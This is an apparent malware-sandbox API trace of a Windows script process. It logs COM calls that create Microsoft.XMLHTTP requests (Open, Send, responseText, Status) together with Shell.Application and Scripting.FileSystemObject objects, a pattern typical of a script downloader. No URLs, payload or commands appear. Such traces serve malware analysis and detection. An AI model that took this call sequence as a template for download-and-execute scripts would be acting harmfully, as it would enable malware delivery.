	[0236.775] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5c38, pUnkSite=0x62f330) 
	[0236.775] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0236.775] XMLHTTPRequest:IUnknown:Release (This=0x49c5c38) returned 0x0
	[0236.775] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5b50) returned 0x0
	[0236.775] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5b50) returned 0x3
	[0236.775] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0236.775] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5b50, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0236.775] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0236.775] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0236.775] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5b50, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Send", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=5) returned 0x0
	[0236.776] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0237.575] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd48 | out: ppvObject=0x28dd48*=0x0) returned 0x80004002
	[0237.575] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5b50, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28de60*="responseText", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc9c | out: rgDispId=0x28dc9c*=10) returned 0x0
	[0237.575] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0237.575] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0237.575] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5b50, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0237.575] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0237.575] CLSIDFromProgIDEx (in: lpszProgID="Shell.Application", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0))) returned 0x0
	[0237.575] SysStringLen (param_1=0x0) returned 0x0
	[0237.575] CoGetClassObject (in: rclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x7fefe928d20) returned 0x0
	[0237.576] Shell:IUnknown:QueryInterface (in: This=0x7fefe928d20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0237.576] Shell:IClassFactory:CreateInstance (in: This=0x7fefe928d20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x396820) returned 0x0
	[0237.576] Shell:IUnknown:Release (This=0x7fefe928d20) returned 0x1
	[0237.576] Shell:IUnknown:QueryInterface (in: This=0x396820, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x396860) returned 0x0
	[0237.576] ??2@YAPEAX_K@Z () returned 0x62f350
	[0237.576] Shell:IObjectWithSite:SetSite (This=0x396860, pUnkSite=0x62f350) returned 0x0
	[0237.576] XMLHTTPRequest:IUnknown:AddRef (This=0x62f350) returned 0x2
	[0237.576] Shell:IUnknown:Release (This=0x396860) returned 0x1
	[0237.576] Shell:IUnknown:QueryInterface (in: This=0x396820, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x396820) returned 0x0
	[0237.576] Shell:IUnknown:AddRef (This=0x396820) returned 0x3
	[0237.576] CLSIDFromProgIDEx (in: lpszProgID="Scripting.FileSystemObject", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28))) returned 0x0
	[0237.576] SysStringLen (param_1=0x0) returned 0x0
	[0237.576] CoGetClassObject (in: rclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x45f000) returned 0x0
	[0237.579] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f000, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0237.579] FileSystemObject:IClassFactory:CreateInstance (in: This=0x45f000, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x45f030) returned 0x0
	[0237.579] FileSystemObject:IUnknown:Release (This=0x45f000) returned 0x0
	[0237.579] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f030, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x0) returned 0x80004002
	[0237.579] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f030, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x45f030) returned 0x0
	[0237.579] FileSystemObject:IUnknown:AddRef (This=0x45f030) returned 0x3
	[0237.946] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0237.946] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5b50, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0237.946] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0237.948] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0237.948] SysStringLen (param_1=0x0) returned 0x0
	[0237.948] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0237.949] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0237.949] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5b50) returned 0x0
	[0237.949] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0237.949] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5aa8) returned 0x0
	[0237.949] ??2@YAPEAX_K@Z () returned 0x62f330
	[0237.949] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5aa8, pUnkSite=0x62f330) 
	[0237.949] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0237.949] XMLHTTPRequest:IUnknown:Release (This=0x49c5aa8) returned 0x0
	[0237.949] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5b50) returned 0x0
	[0237.949] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5b50) returned 0x3
	[0237.949] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0237.949] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5b50, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0238.073] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0238.073] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0238.073] SysStringLen (param_1=0x0) returned 0x0
	[0238.073] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0238.073] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0238.073] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5bb0) returned 0x0
	[0238.073] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0238.073] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5bb0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5c18) returned 0x0
	[0238.074] ??2@YAPEAX_K@Z () returned 0x62f310
	[0238.074] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5c18, pUnkSite=0x62f310) 
	[0238.074] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0238.074] XMLHTTPRequest:IUnknown:Release (This=0x49c5c18) returned 0x0
	[0238.074] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5bb0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5bb0) returned 0x0
	[0238.074] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5bb0) returned 0x3
	[0238.074] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5bb0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0238.074] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5bb0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0238.074] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5bb0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0238.074] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0238.074] SysStringLen (param_1=0x0) returned 0x0
	[0238.074] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0238.074] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0238.074] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c74c0) returned 0x0
	[0238.074] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0238.075] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74c0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7728) returned 0x0
	[0238.075] ??2@YAPEAX_K@Z () returned 0x62f330
	[0238.075] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7728, pUnkSite=0x62f330) 
	[0238.075] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0238.075] XMLHTTPRequest:IUnknown:Release (This=0x49c7728) returned 0x0
	[0238.075] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74c0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c74c0) returned 0x0
	[0238.075] XMLHTTPRequest:IUnknown:AddRef (This=0x49c74c0) returned 0x3
	[0238.075] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74c0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0238.075] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c74c0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0238.075] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74c0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0238.075] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0238.075] SysStringLen (param_1=0x0) returned 0x0
	[0238.075] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0238.075] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0238.075] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5aa0) returned 0x0
	[0238.075] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0238.075] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5c18) returned 0x0
	[0238.075] ??2@YAPEAX_K@Z () returned 0x62f310
